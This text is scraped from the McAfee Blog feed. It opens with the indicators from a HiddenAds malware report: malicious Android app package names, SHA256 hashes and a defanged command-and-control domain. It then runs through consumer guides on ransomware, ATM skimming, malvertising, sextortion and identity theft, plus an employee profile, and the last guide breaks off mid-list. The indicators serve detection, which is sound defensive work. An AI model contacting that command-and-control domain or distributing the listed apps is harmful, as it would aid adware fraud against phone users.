Super Clean com.super.clean.zaz 500K+
Full Clean -Clean Cache org.stemp.fll.clean 1M+
Fingertip Cleaner com.fingertip.clean.cvb 500K+
Quick Cleaner org.qck.cle.oyo 1M+
Keep Clean org.clean.sys.lunch 1M+
Windy Clean in.phone.clean.www 500K+
Carpet Clean og.crp.cln.zda 100K+
Cool Clean syn.clean.cool.zbc 500K+
Strong Clean in.memory.sys.clean 500K+
Meteor Clean org.ssl.wind.clean 100K+

 

SHA256:

  • 4b9a5de6f8d919a6c534bc8595826b9948e555b12bc0e12bbcf0099069e7df90
  • 4d8472f0f60d433ffa8e90cc42f642dcb6509166cfff94472a3c1d7dcc814227
  • 5ca2004cfd2b3080ac4958185323573a391dafa75f77246a00f7d0f3b42a4ca3
  • 5f54177a293f9678797e831e76fd0336b0c3a4154dd0b2175f46c5a6f5782e24
  • 7a502695e1cab885aee1a452cd29ce67bb1a92b37eed53d4f2f77de0ab93df9b
  • 64d8bd033b4fc7e4f7fd747b2e35bce83527aa5d6396aab49c37f1ac238af4bd
  • 97bd1c98ddf5b59a765ba662d72e933baab0a3310c4cdbc50791a9fe9881c775
  • 268a98f359f2d56497be63a31b172bfbdc599316fb7dec086a937765af42176f
  • 690d658acb9022765e1cf034306a1547847ca4adc0d48ac8a9bbdf1e6351c0f7
  • 75259246f2b9f2d5b1da9e35cab254f71d82169809e5793ee9c0523f6fc19e4b
  • a5cbead4c9868f83dd9b4dc49ca6baedffc841772e081a4334efc005d3a87314
  • c75f99732d4e4a3ec8c19674e99d14722d8909c82830cd5ad399ce6695856666

Domains:

  • http[://]hw.sdk.functionads.com:8100

The post New HiddenAds malware affects 1M+ users and hides on the Google Play Store appeared first on McAfee Blog.

]]>
What Are Ransomware Attacks? An In-Depth Guide https://www.mcafee.com/blogs/tips-tricks/what-are-ransomware-attacks-an-in-depth-guide/ Mon, 25 Jul 2022 11:06:59 +0000 https://www.mcafee.com/blogs/?p=151180

We all love to spend time surfing the web — whether we’re shopping, paying bills, or reacting to funny memes....

The post What Are Ransomware Attacks? An In-Depth Guide appeared first on McAfee Blog.

]]>

We all love to spend time surfing the web — whether we’re shopping, paying bills, or reacting to funny memes. The internet has also allowed many of us to keep working from home even during the pandemic.  

The internet is great, but the best way to keep enjoying it is to know where and how bad actors can pop up in our computer systems. 

One way is through the use of ransomware, which is a type of malware that threatens users with blocked access or doxing (exposing personal information) if they don’t pay money to the cybercriminals who sent the malicious software.  

We’ll explain what ransomware is, how it works, and how to defend against it so you can stay one step ahead and continue enjoying life online. 

What is ransomware?

Ransomware is malware that uses encryption to hold your information at ransom. This might mean you can’t access critical data in files, databases, or applications. The cybercriminal will then usually demand a ransom to provide access.  

Often, ransomware includes a deadline to add a sense of urgency to the threat. Typical ransomware attacks might suggest that your data will be lost or published on the web for the world to see if you don’t pay. Ransom demands generally ask for payment in Bitcoin or some other form of cryptocurrency, where transactions are less regulated and traceable. 

Unfortunately, ransomware is often designed to spread across a network and target database and file servers — quickly paralyzing an entire organization. Ransomware attacks represent a growing problem, generating billions of dollars in payments to cybercriminals and inflicting damage and expenses for businesses and governmental organizations.  

However, if you have a basic understanding of how ransomware works, you can take steps to protect yourself. 

How does ransomware work?

Ransomware uses asymmetric encryption, which uses a mixture of symmetric and asymmetric encryption methods to make it more difficult to decrypt ransomed data files. Put simply, cybercriminals using asymmetric encryption generate a public key to encrypt files and a separate but private key to decrypt the same files. As a result, the victim has to rely on the hacker for the decryption key — for a price, of course — because the private key to decrypt the files is stored on the attacker’s server.  

The attacker then makes the private key available to the victim only after the ransom is paid, although this isn’t always the case, as seen in recent ransomware campaigns. Without access to the private key, it can be difficult to decrypt the files being held for ransom. 

Many forms of ransomware exist. Often, ransomware (and other malware) is distributed using email spam campaigns or through targeted attacks. Malware needs an attack vector, which is how a cybercriminal gains access to a device to deliver malicious software. This might take the form of an email attachment, webpage, pop-up window, or even instant message. After malware establishes its presence, though, it’ll stay on the system until it finishes its task. 

After a successful exploit, ransomware drops and executes a malicious binary on the infected system. This binary then searches and encrypts valuable files, such as Microsoft Word documents, images, databases, and so on. The ransomware may also exploit system and network vulnerabilities to spread to other systems and possibly across entire organizations. 

Once files are encrypted, ransomware prompts the user for a ransom to be paid within 24 to 48 hours to decrypt the files, or they’ll be lost forever. If a data backup is unavailable or those backups are encrypted, the victim might have to pay the ransom to recover their personal files. 

Examples of ransomware attacks

Cyberattacks, including different types of ransomware, occur and evolve all the time, but there are several ways to avoid them. 

It all starts with looking to the past to protect your sensitive data in the future. In the next few sections, we’ll cover how hackers have engaged in extortion across computer systems over the years. 

CryptoLocker

CryptoLocker was one of the earliest adopters of this type of malware — demanding a ransom payment in cryptocurrency for a user to get their data back. In fact, it was probably the first time many people had heard the term “ransomware.” 

In 2013, CryptoLocker attacked through an email attachment that looked like the tracking notifications of shipping companies like UPS and FedEx. It resulted in more than 250,000 infected computer systems and up to $27 million in extorted money. 

Although a decryption key has existed for CryptoLocker since 2014, it can still cause problems for users who may not recognize the presence of the ransomware before opening the attachment. 

WannaCry

In 2017, Wannacry took the “worm” approach to ransomware, spreading across Windows PCs through shared networks. At the time, the ransomware turned everything on the computer into encrypted data, with the hackers threatening not to return the data until the ransom was paid (in this case, cryptocurrency). Estimates point to over 200,000 computers being infected around the world.  

A killswitch was created to help operating systems infected with WannaCry, but the hacking group is still out there posing new threats. 

Kaseya

The Kaseya ransomware attacks occurred on July 2, 2021, and led to an FBI response because this represented a global cybercrime event. In this instance, though, the ransomware group REvil made damaging use of vulnerabilities found in the on-premises software of Kaseya VSA. The hackers then demanded $70 million in Bitcoin. 

The company managed many service providers, so the attack affected all of the downstream customers of those service providers. In fact, the malware attack may have affected around 1,500 organizations across the world.  

The good news is that patches have now been developed for affected servers. 

JBS

You might not immediately think of the world’s largest meat supplier as being one of the victims of ransomware, but that’s exactly what happened to JBS Foods.  

Threatening to disrupt the food supply chain in May 2021, organized cybersecurity attacks by REvil targeted JBS’s North American and Australian plants, encrypting data that was then ransomed for over $11 million worth of Bitcoin by the company.  

Colonial Pipeline

On May 7, 2021, hackers made malicious use of a single leaked password belonging to a virtual private network (VPN) account associated with the Colonial Pipeline Company.  

Even though the breached account had been dormant for some time, it was still successfully used as an entry point to the Colonial network. The password to this account was linked to a batch of compromised passwords on the dark web, leading officials to believe it could have been an employee who re-used the same password for other accounts.  

 

This major cybersecurity event showcases the ways that ransomware can set up camp inside computer systems without the use of phishing. 

How to defend against ransomware

Being proactive is one of the best things you can do to safeguard against ransomware attacks. This means thinking ahead to what vulnerabilities may exist in your current computer network setup and addressing them before they’re used for cyber extortion.  

There are several ways you can help reduce your exposure to cybercriminals by simply being alert to where they usually get in. The following sections offer information on how to set up the best possible defense against ransomware. 

Back up your data

The best way to avoid the threat of being locked out of your critical files is to ensure that you always have backup copies of them, preferably in the cloud and on an external hard drive. This way, if you do get a ransomware infection, you can wipe your computer or device free and reinstall your files from backup. This protects your data, and you won’t be tempted to reward the malware authors by paying a ransom. Backups won’t prevent ransomware but they can help mitigate the risks. 

Secure your backups

Make sure your backup data isn’t accessible for modification or deletion from the systems where the data resides. Ransomware will look for data backups and encrypt or delete them so they can’t be recovered, so it’s important to use backup systems that don’t allow direct access to backup files. 

Use security software and keep it up to date

Make sure all of your computers and devices are protected with comprehensive security software and keep all of your software up to date. Make sure you update your devices’ software early and often, as patches for flaws are typically included in each update.

Practice safe surfing

Be careful where you click. Don’t respond to emails and text messages from people you don’t know and only download applications from trusted sources. This is important since malware authors often use social engineering to try to get you to install dangerous files.[Text Wrapping Break] 

Only use secure networks

Avoid using public Wi-Fi networks since many of them aren’t secure and cybercriminals can snoop on your internet usage. Instead, consider installing a VPN like McAfee Secure VPN, which provides you with a secure connection to the internet no matter where you go.[Text Wrapping Break] 

Stay informed

Keep current on the latest ransomware threats so you know what to look out for. In the case that you do get a ransomware infection and haven’t backed up all of your files, know that some decryption tools are made available by tech companies to help victims. 

What to do if you’re the victim of a ransomware attack

Ransomware attacks don’t have to spell disaster if you catch them in time and know what to do. If you suspect you’ve been hit with a ransomware attack, it’s important to act quickly.  

Fortunately, there are several steps you can take to address ransomware issues quickly and have your computer systems return to business as usual in no time. 

  1. Isolate the infected device. Many antimalware programs start by discovering where the ransomware has made its home. This might be on a single device within your network or on many devices. Whatever the case, separating infected computers and other devices from the primary network and any other avenues to your sensitive data should be step one.
  2. Assess the damages. Understanding what the ransomware on your computer has had access to is the next step. Is it just your password-protected online accounts, or have your financial and health care records also been involved? Sometimes, the extent of the damage is immediately obvious. Other times, as with many phishing emails, you’ll be able to see that only certain aspects of your private information have been hijacked.
  3. Identify the ransomware. Finding out who and what has actually breached your privacy is crucial. Well-known hacker groups like REvil and Darkside often restrict their attacks to giant corporations, but the advent of things like ransomware as a service (RaaS) means that bad actors can and will target anyone now.
  4. Report the ransomware to authorities. Whether you discover that you have been hit by a somewhat vintage ransomware group like Petya or a more sophisticated modern program like Ryuk, always report your ransomware experience to law enforcement. The main reason for this is to help officials continue to develop decryptor systems until there’s no more ransom software to worry about. The secondary reason is so you aren’t seen as complicit with the actions of any hacker group that has targeted your information.
  5. Evaluate your backups. Lastly, take a good look at your storage and backup systems once you’re through the first hassles of a ransomware attack. Make sure that any external hard drives or cloud storage spaces have remained clean. If these safe spaces still exist, you can usually use them to help restore most of your sensitive data. 

Get a personalized protection plan

We’ve all spent more time online recently in the wake of the pandemic, and no one needs cybersecurity issues on their plates during this or any other time. The good news is that antivirus software is evolving rapidly and there are plenty of steps you can take to shield your computer systems from needless attacks like ransomware. 

One surefire way to get peace of mind against hacker groups is to put your trust in the expert care of Total Protection services from McAfee. All of our plans come with a private VPN, antivirus protection, and safe-browsing features. This means you can live your connected life free from threats like ransomware, malware, and more.  

With multiple affordable plans, there’s a McAfee protection plan for every person. It’s a small price to pay for staying one step ahead of ransomware attacks.  

The post What Are Ransomware Attacks? An In-Depth Guide appeared first on McAfee Blog.

]]>
What is ATM Skimming? https://www.mcafee.com/blogs/privacy-identity-protection/what-is-atm-skimming/ Fri, 22 Jul 2022 13:00:12 +0000 http://blogs.mcafee.com/?p=40590

Ever hear of a crime called skimming? It may not be as dramatic a crime as assault or Ponzi schemes,...

The post What is ATM Skimming? appeared first on McAfee Blog.

]]>

Ever hear of a crime called skimming? It may not be as dramatic a crime as assault or Ponzi schemes, but it can cause significant problems to you as your  savings account can be wiped out in a flash.

Picture a scrawny nerd tampering with an automated teller machine (ATM)—the machine you use with your debit card to get cash. The thief places a device over the slot through which you slide your debit card. You have no idea it’s there. You swipe your card, and the device “skims” or reads your card’s information. In the middle of the night, the thief creeps back, removes the skimming device, downloads your data, burns it to a blank ATM card, makes a fat withdrawal and goes home with the loot. Or they could download your information from the skimmer and then use your information to make online purchases or access your account. Either way, they could clean you out before you wake up next morning!

Now, to be successful, the criminal not only needs a skimming device, they also need to attach a tiny wireless camera to capture your PIN.  These cameras are usually concealed in the lighting fixture above the keypad, in a brochure near the machine, or attached directly to the ATM.

To protect yourself from being skimmed, and generally staying safe when using your debit or credit cards, follow these tips:

  • Scrutinize the ATM. This means every ATM, even ones from your bank. You also want to check any of the card sliders like ones at gas stations, etc, especially if you’re using your debit card. If the scanner does not match the color and style of the machine, it might be a skimmer. You should also “shake”  the card scanner to see if it feels like there’s something  attached to the card reader on the ATM.
  • Cover the keypad when entering your PIN. In order to access your bank accounts, thieves need to have your card number and your PIN. By covering the keypad, you prevent cameras and onlookers from seeing your PIN.
  • Check your bank and credit card statements often. If someone does get your information, you have 60 days to report any fraudulent charges to your credit card company in order not to be charged. For a debit card, you only have about 2 days to report any suspicious activity.
  • Be choosy. Don’t use general ATMs at bars or restaurants. These are not usually monitored and therefore, can be easily tampered with by anyone.

Stay safe from skimming!

The post What is ATM Skimming? appeared first on McAfee Blog.

]]>
What Is Malvertising and How Do You Avoid It? https://www.mcafee.com/blogs/tips-tricks/what-is-malvertising-and-how-do-you-avoid-it/ Fri, 22 Jul 2022 12:48:53 +0000 https://www.mcafee.com/blogs/?p=151186

Smartphones and personal computers have enhanced our lives in so many ways that it can be hard to even imagine...

The post What Is Malvertising and How Do You Avoid It? appeared first on McAfee Blog.

]]>

Smartphones and personal computers have enhanced our lives in so many ways that it can be hard to even imagine a world without them. The internet is an awesome place with endless opportunities and possibilities, but it’s also home to some seedy characters that can expose us to certain risks, like malvertising. 

Malvertising, which is short for malicious advertising, attacks and compromises systems by spreading advertisements injected with malicious code. Legitimate advertising networks can then display these malicious advertisements without even knowing they’re infected.  

In this article, we’ll take a closer look at what malvertising is and what you can do to secure your data and keep your information safe online. We’ll also provide some examples so you can fully understand how malvertising might be used.  

Having a thorough understanding of malvertising is the first step toward keeping the internet a safe place for you and your family. 

How does malvertising affect you online?

Since malvertising disguises malicious code inside legitimate online advertising, ad networks may find it hard to stop malvertising from appearing as legitimate ads.  

Viewing malvertisements can put your personal information at risk, such as your identification information, contact details, and financial data. It can also alter or delete your information, hijack your computer functions, spy on your computer activities, and steal your data. And this all can happen without your knowledge.  

The type of risk, though, depends on the programs that the malvertising successfully downloads onto your device. These programs can include: 

  • Malware: This includes any malicious program that can harm your device or steal your information. 
  • Ransomware: Ransomware is exactly what it sounds like. It encrypts your files or locks your devices and requires you to pay a ransom to use them again. Cybercriminals generally require the ransom to be in cryptocurrency because it is untraceable.  
  • Spyware: This is a type of malware that spies on your online activities without your knowledge. Spyware puts your device’s security at risk and violates your privacy.  
  • Adware: Adware is short for advertising-supported software and hides on your device while serving you pop-up ads. This can slow down your device and install spyware or viruses on it.  
  • Viruses: A virus is a computer program that replicates itself onto computer programs and is designed to steal data or damage the device.  

Examples of malvertising 

Cybercriminals use various methods to inject infected code into online ads. Below are some examples of the types of malvertising that can pose a risk to your cybersecurity and exploit vulnerabilities on your devices. 

  • Ad creative containing malware: Text or banner ads can contain embedded malware. The infected ads — even if they’re display ads that aren’t clicked on — can put all of the devices that displayed the ad at risk for scams or malicious software.  
  • Ad calls containing malicious code: A cybercriminal can add infected code to an ad payload and infect any devices that display the ad.  
  • Video containing malware: Video players are vulnerable to malware since they don’t have any protection against it. Videos can display malicious links and, consequently, infect your device.  
  • Compromised URLs: Whenever a user clicks on an ad, it directs them between several URLs that eventually lead them to a landing page. If any of these URLs get infected with malicious code, the user’s computer can be at risk of a cyberattack.  
  • Landing page with a malware-infected element: Legitimate websites can also contain elements infected with malware. When you click on an ad and get directed to a legitimate landing page, your device can still be infected by a malicious element on the page.  
  • Pixel containing malware: Cybercriminals can intercept the delivery path of a pixel and send malicious code to your browser.  
  • Flash video containing malware: Flash files can load a pre-roll banner injected with malicious code. This can infect your device once it gets exposed to it without you having to click on the video.  

Even highly reputable and popular websites, such as The New York Times, the BBC, Spotify, and AOL, have been targeted in the past by malicious ads, putting billions of visitors at risk. Any website can become a target.  

What’s the difference between malvertising and adware?

Malvertising is often confused with ad malware. Both are forms of malware and involve infected advertisements, but they’re fundamentally different.  

Malvertising uses malicious code that can cause harm to anyone viewing the infected advertisement, while adware is used to target individuals by forcing ads onto their devices to generate clicks. Users can get bombarded with pop-up ads, which can affect their devices. Adware also collects browsing information to sell to advertisers. This is often referred to as browser hijacking. 

How to avoid malvertising as a web user

Taking the necessary steps to protect your online activities and personal identifying information can help shield you from malvertising attacks. Massive volumes of online ads are displayed every day, so it’s never been more important to safeguard yourself against any shady activity on the internet.  

Taking a few steps can help you avoid malvertising and minimize your risk of identity theft.  

  • Take advantage of identity protection software like McAfee. We can help you stay protected against cybercrime with identity monitoring and identity restoration services (in the event of identity theft).  
  • Always ensure that your ad blocker and antivirus software are up to date. These can help reduce the risk of malvertising. Keep in mind that outdated software becomes less effective with time.  
  • Don’t use Java or Flash. The Flash player is vulnerable to cyberthreats since it’s an outdated plugin. Java is another plugin that allows software to be executed within your browser and carries a high risk of being abused to circumvent security measures on your device. You can disable the plugins or uninstall them entirely.  

Keep your information secure online with McAfee

With so much sensitive information being shared online, it’s never been more important to take the necessary steps to help keep your data and privacy safe.  

McAfee Total Protection services can help increase cybersecurity on your devices and keep your identity private from hackers. We offer all-in-one protection so you can get the peace of mind you deserve while enjoying the internet. 

All products include identity monitoring, automated privacy using a virtual private network (VPN), a password manager, a firewall, and much more. We also offer identity restoration assistance and up to $1 million in identity theft coverage to help relieve the burden of data breaches.  

Get comprehensive identity protection from McAfee and get back to surfing the internet with confidence.  

The post What Is Malvertising and How Do You Avoid It? appeared first on McAfee Blog.

]]>
Sextortion: What Your Kids Need to Know https://www.mcafee.com/blogs/family-safety/sextortion-what-your-kids-need-to-know/ Thu, 21 Jul 2022 21:42:01 +0000 https://www.mcafee.com/blogs/?p=156254

Sextortion is something no parent wants to think could happen to their child, nor a topic most of us would...

The post Sextortion: What Your Kids Need to Know appeared first on McAfee Blog.

]]>

Sextortion is something no parent wants to think could happen to their child, nor a topic most of us would ever imagine we’d need to discuss in our homes. However, according to the latest FBI reports, sextortion is a digital threat to children that, woefully, is on the rise.

According to the FBI, there has been a considerable increase lately in sextortion cases involving children and teens being coerced by adults online.

What is sextortion?

A sextortion scenario can emerge in several ways. Most often, it occurs when an adult (posing as a peer) engages in casual conversation with an underage child, gains their trust through online conversation, then pressures or threatens the child into sharing sexual photos or videos of themselves.

Random contacts

In some cases, the initial contact with the criminal will be a threat. The person may claim to already have a revealing picture or video of a child that they threaten to share if the victim does not send more pictures.

Known contacts

According to the FBI, this crime more often starts when young people believe they are communicating with someone their age who is interested in a relationship or with someone who is offering something of value. This catfish (false profile) relationship usually involves the predator using gifts, money, flattery, lies, or other methods to get a young person to produce an image.

How does sextortion begin?

These dangerous conversations can be initiated through text, a social or chat app, a gaming site, or any number of digital connection points.

After a criminal successfully obtains a photo or video from their victim, the threats can escalate to promises to publish the content or even hurt the child if they don’t send more. This emotionally harrowing situation can ignite shame, fear, and confusion in children who may be too embarrassed to ask for help or report the abuse.

While these criminals rarely request to meet their victims face-to-face, the emotional and physical impact of sextortion can be devastating to a child. According to the FBI, some victims report abusers who become vicious with non-stop harassment and threats. Victims can feel scared, alone, embarrassed, and increasingly desperate. Sadly, as reported in the news, this type of crime can leave some children feeling like they have no way out of the situation.

What can families do?

Talk about the reality of sextortion.

If you are a parent or caregiver, explain to your child how sextortion can happen to anyone online and why it’s important to only connect with known friends and family. Parents: Consider boosting your device security with parental controls that filter content, report your child’s online activity, and reveal potential problems.

Master and repeat the basics.

Some essential safety protocols kids should follow online are worthy of repeating. They are:

1) Make social accounts private, don’t share personal information, and only connect with known friends

2) Ignore and block messages from strangers

3) Keep your guard up. People can pretend to be anyone online, and photos can be altered

4) Be suspect if anyone asks you to message or text with them privately

5) Never share risky photos with anyone online—even a trusted friend

6) Tell someone immediately if someone is threatening you online.

Audit all digital connections.

With your child, go through their apps, social networks, chats, gaming communities, and friend groups and do some editing, defriending, and blocking. Make sure both you and your child know and trust all their online connections. Remember: Open communication and an honest relationship with your child are the most powerful tools you have to keep your child safe online.

Be clear to remove any fault.

A sextortion situation for a child can be incredibly confusing and cause them to isolate and avoid telling anyone about it. Remind and be clear with your child that they would never be in trouble for coming to you with any problem. Let them know that sextortion is a crime for the perpetrator and that they have not broken any laws by sending photos (despite what an abuser might have told them).

Report the crime.

Victims of sextortion should go to a parent or trusted adult and tell them they need help. While doing this can feel terrifying, it’s crucial for victims to know people understand and want to help. For parents and caregivers, contact the FBI at 1-800-CALL-FBI or report the crime online at tips.fbi.gov.

While the bad actors online are out to exploit and ruin our digital spaces, it’s important to maintain a healthy perspective rather than responding with fear. Remind your kids that there’s an army of people even more dedicated than the criminals; people like the FBI who are out to stop online crime and keep the internet safe for families. Additionally, as a parent or caregiver, your commitment to helping your family stay informed, equipped, and empowered online is how we all win.

The post Sextortion: What Your Kids Need to Know appeared first on McAfee Blog.

]]>
Kicking off my Second Career: Gayatri’s McAfee Journey https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/kicking-off-my-second-career-gayatris-mcafee-journey/ Thu, 21 Jul 2022 19:19:10 +0000 https://www.mcafee.com/blogs/?p=156181

Our How I Got Here series spotlights the stories of team members who have successfully grown their career here at McAfee. This...

The post Kicking off my Second Career: Gayatri’s McAfee Journey appeared first on McAfee Blog.

]]>

Our How I Got Here series spotlights the stories of team members who have successfully grown their career here at McAfee. This journey features Gayatri who kicked off her second career at McAfee after leaving her role and returning to further education.

My McAfee Career Journey

McAfee truly kicked off my second career journey! I previously worked as a Software Engineer before I joined the McAfee Pre-sales Operations team as a summer intern as part of my business graduate program. One thing led to another, and I joined McAfee full-time as a Technical Project Analyst after I graduated later that year!

I’ve always believed in having a growth mindset, I embrace learning and looking for ways to build on my achievements. I’m proud to be part of an organization that nurtures this and helps you pursue your passions. For example, in 2019 I moved from a team focused on products and services for large businesses to a team focused on individual consumers. The needs of consumers versus big businesses are very different, so the business operations work supporting that focus are very different as well. It was a steep learning curve, but I felt supported every step of the way, and since then have grown so much!

Getting outside my comfort zone

Back in 2011, I was a software engineer spending my days doing programming and web development. While I was happy doing that, it was after working on many client-facing projects that I aspired to work at the intersection of business and technology. So, I left engineering and went to business school.

Taking a break from my full-time job to pursue formal business education in a new country was a big step outside my comfort zone. It was challenging to find balance, but the journey was worth it!

Teaming together to see the bigger picture

Today, I am a Sales Enablement and Operations Manager supporting sales teams all over the world. My focus areas include managing platforms and tools like Salesforce, Power BI, and SharePoint Sales Portal, as well as our department’s training and enablement programs – in other words, technology and professional development that help our team members be successful. Plus, I’m a key team member for an array of programs and projects that are pushing the business forward.​​​​​​​​

My work is highly collaborative, and I really enjoy working on projects with colleagues across different departments all over the world. I get to see the bigger picture, better understand the business context, and see the WHY behind the initiatives we drive.​​​​​​​​​​​​​​​​​​​​​

From business projects to being a part of the McAfee WISE (Women in Security) Board, it’s the people, culture, and opportunity that sets McAfee apart. I love working with the amazing people at McAfee!

Underlying it all: Working at McAfee matters because ultimately what we do helps protect lives of millions of people online.

My advice for anyone looking to drive their career forward is:

I have come to realize that the pain of staying the same is greater than the pain of changing and growing. Develop a growth mindset to keep moving forward!

The post Kicking off my Second Career: Gayatri’s McAfee Journey appeared first on McAfee Blog.

]]>
9 Ways to Determine If Your Identity Has Been Stolen https://www.mcafee.com/blogs/privacy-identity-protection/9-ways-to-determine-if-your-identity-has-been-stolen/ Thu, 21 Jul 2022 13:17:41 +0000 https://www.mcafee.com/blogs/?p=133414

Most of us use the internet every day, so we’re comfortable sharing a lot of information online. However, cybercriminals want...

The post 9 Ways to Determine If Your Identity Has Been Stolen appeared first on McAfee Blog.

]]>

Most of us use the internet every day, so we’re comfortable sharing a lot of information online. However, cybercriminals want us to get a bit too comfortable so they can take our personal or financial data and use it for their benefit. This is called identity theft, and it can cost people money and may dip their credit score.

Fortunately, you can help minimize what happens by knowing the signs of identity theft and taking fast action when you recognize them. Find out how below.

How does identity theft happen?

Being online comes with many benefits, but it can also come with some risks. Identity theft usually begins with the criminal accessing sensitive personal data, such as Social Security numbers, birth dates, home addresses, bank account information, and driver’s license details. The fraudster can then take this information to fake your identity, using it to take out credit cards, apply for loans, and more.

Here’s a quick look at some ways identity thieves can get their hands on your valuable data:

  • Phishing scams: Phishing scams can come in the form of mail, email, or websites. They may involve an identity thief pretending to be an entity you trust, like your own bank or insurance provider, to extract personal data.
  • Data breaches: Many companies store your data, from your health care provider to your internet service provider. For example, you may save payment details for your favorite shopping site. If hackers target those companies in a data breach, they can leak or access your sensitive information.
  • Social media snooping: Criminals may look to your social media to get information, like your birthdate and home address. Even seemingly innocent details, like the names of your children or pets, can be of interest to an identity thief. Why? People often use these details in their passwords.
  • Hacking devices: Hackers may try to infiltrate your computer, tablet, or mobile device through viruses or malware. That’s where antivirus software can help. McAfee’s Total Protection service works for you by protecting your devices and personal information from criminals.
  • Simple theft: Not all identity thieves use advanced methods to get your information. In fact, a person can steal your phone and access any personal data you have on it if they can unlock it. Since many people save passwords to sensitive accounts on their devices, they are easy to hack.
  • Dumpster diving: This is another example of a less tech-savvy approach to identity theft. If you throw away documents with sensitive data, thieves may get the information they want from your garbage. For example, bank account statements contain your account numbers, while pay stubs may include Social Security numbers. You should always shred paperwork before tossing it.

There are many ways thieves can get their hands on your data. Luckily, there are ways you can protect yourself against these methods. For example, you can protect your computer, tablet, or mobile device against hackers by equipping it with a strong password and safeguarding against phishing by adding a firewall and utilizing a virtual private network (VPN) like those offered by McAfee.

9 warning signs your identity has been stolen

With some best practices, you can protect your data and help safeguard you and your family against identity theft. One way to continue living your best life online is to watch for potential warning signs of identity theft. This ensures you can take fast action and minimize the effects if you’re targeted. Here are some essential signs to look out for.

You’re alerted to a credit card charge you didn’t make

Financial identity theft is one of the most common types of identity theft, and credit cards are a popular target. The rise in online shopping has made credit card fraud even more common.

Your online banking portal or app should allow you to set up alerts to email, call, or text you about suspected fraudulent credit card charges. If you get an alert, someone may have taken your identity.

Your loan or credit card application was denied

If you apply for a loan or line of credit and your application is denied, dig deeper. A rejection could indicate that your credit score is lower than you thought, possibly due to fraudulent activity. For example, someone may use your information to get new credit cards and not pay them off, leaving you responsible.

There’s a change to your credit score

Changes in your credit score can indicate identity theft. For example, if someone takes out utility bills in your name and doesn’t pay them, your credit score may dip. Checking your credit report from each of the three major credit bureaus (Equifax, Experian, and TransUnion) can help pinpoint the problem.

The Federal Trade Commission (FTC) allows U.S. consumers to get a free credit report every 12 months. Just visit AnnualCreditReport.com to get a copy of yours from the credit reporting agencies. You can also pay for credit monitoring services to track your score.

There’s a new account you didn’t open under your name

Once identity thieves obtain enough data, including your name and address, they might be able to open new accounts and credit cards. When you check your credit report, keep an eye out for new accounts that you didn’t open. Another red flag is if you start getting bank statements or bills addressed to you for accounts you don’t recognize.

Your information was part of a data breach

Companies are required to notify customers of data breaches that could impact them. For example, if you save your payment information and home address on a music streaming provider’s website and their database is hacked, identity thieves may get your data. Keep an eye out for notifications and read the news. The McAfee blog is another great resource for information on data breaches.

Debt collectors call about accounts you never opened

If debt collectors start calling, be cautious, especially if they’re referring to accounts you aren’t familiar with. Don’t provide personal information to any collection agencies that call, as this can be a potential phishing scam. However, it’s a good idea to follow up on these cases by checking your credit report for new accounts. You could be liable if someone opened accounts under your name and didn’t pay them.

You receive bills for medical services you never used

Medical theft occurs when a fraudster imitates another person to get health care or supplies. For example, a person might use your identity to get prescription medication at a pharmacy. If you get unfamiliar medical bills, follow up. Incorrect medical records could impact your insurance premiums or interfere with your ability to get the care you need in the future.

Mail is addressed to your home but with another person’s name

This could be an indicator of synthetic identity theft. This occurs when a fraudster creates a fake identity using various people’s real information. For example, they may use your address and Social Security number and another person’s photo to create a fake persona that’s creditworthy. They can then take out credit cards in that fake person’s name.

A tax return is filed under your name without your knowledge

If you receive a confirmation of an annual tax filing before you’ve filed, take note. Criminals may try to file a tax return for another person to access their tax refund. Alternatively, you may find that you’re unable to e-file your taxes, which can occur if someone else has already filed under your name.

What to do if you think your identity has been stolen

No one wants their identity stolen, but it’s still good to be prepared if it does happen. If you notice the above red flags, here are some steps you may need to take:

  • Change passwords and login details for any affected accounts. If you use the same password for other accounts, change those too. The good news is that McAfee’s identity protection services come with a password manager, so you don’t have to worry about remembering your credentials across devices.
  • Freeze accounts with banks or credit card companies that show any suspicious activity, including debit and credit card Most financial institutions have a dedicated fraud department to help.
  • Review your credit reports if you haven’t already and report any suspected fraud to the respective credit bureau.
  • Contact local law enforcement to file a police report for lost or stolen credit cards, driver’s licenses, and more. Also, report your lost license to the DMV.
  • Alert the IRS fraud alert department in case of tax-related fraud.
  • Report Social Security-related fraudulent activity to the relevant government agency, the Social Security Administration’s Office of the Inspector General.
  • Place a freeze on your credit report. This blocks access to it to extend credit, ensuring no one can take out new lines of credit in your name.

You may also want to visit IdentityTheft.gov to report identity theft and find resources to help guide your recovery plan.

Get personalized online protection

Worries about identity fraud shouldn’t prevent your household from enjoying the benefits of a connected world. McAfee’s identity theft protection services can help you enjoy everyday conveniences while keeping you safe. Packages can be tailored to your needs, including 24/7 monitoring, ID theft coverage, VPN services, and more. It’s guided online protection made easy.

The post 9 Ways to Determine If Your Identity Has Been Stolen appeared first on McAfee Blog.

]]>
5 Common Types of Identity Theft https://www.mcafee.com/blogs/privacy-identity-protection/5-common-types-of-identity-theft/ Sat, 16 Jul 2022 01:59:43 +0000 https://www.mcafee.com/blogs/?p=133387

The internet provides plenty of fun and exciting opportunities for you and your family, from sharing on social media to...

The post 5 Common Types of Identity Theft appeared first on McAfee Blog.

]]>

The internet provides plenty of fun and exciting opportunities for you and your family, from sharing on social media to online shopping. To help you enjoy every minute of it, though, it’s good to be aware of what less savory characters are up to.

And they sure have been busy. In fact, the U.S. Federal Trade Commission (FTC) received 2.1 million fraud reports in 2020. What is identity theft? Well, it’s the fraudulent use of another individual’s name and details for personal gain.

Those affected by identity fraud may see a dip in their finances and credit scores. They may also deal with anxiety around financial security going forward. However, while it’s important to be aware of the threat of identity theft, this shouldn’t be cause for alarm. There are plenty of tools and techniques that can help protect you and your family so you can continue to enjoy everything modern technology has to offer.

The first step in protecting yourself? Educate yourself. Understanding the different types of identity theft can help you safeguard yourself and your loved ones so that you can continue all your favorite online activities. Here we’ll define and explore the different types of identity theft to watch out for.

What is identity theft?

We’ve all probably heard of identity theft, but what is it? Identity theft is when someone uses another person’s financial or personal data, usually for monetary gain. This means a fraudster may take sensitive information like names, birthdates, Social Security numbers, driver’s license details, addresses, and bank account numbers or credit card numbers. They might then use this information to make purchases, open credit cards, and even use health insurance to get medical care.

5 types of identity theft

A little knowledge can go a long way in stopping cybercriminals in their tracks — especially since they’re becoming more sophisticated and coming up with new schemes every day.

Here are five common types of identity theft to help you stay one step ahead of hackers.

Financial identity theft

Financial identity theft is when one person uses another’s personal data for financial benefit. This is the most common form of identity theft (including the credit card example described above). Financial identity theft can take multiple forms, including:

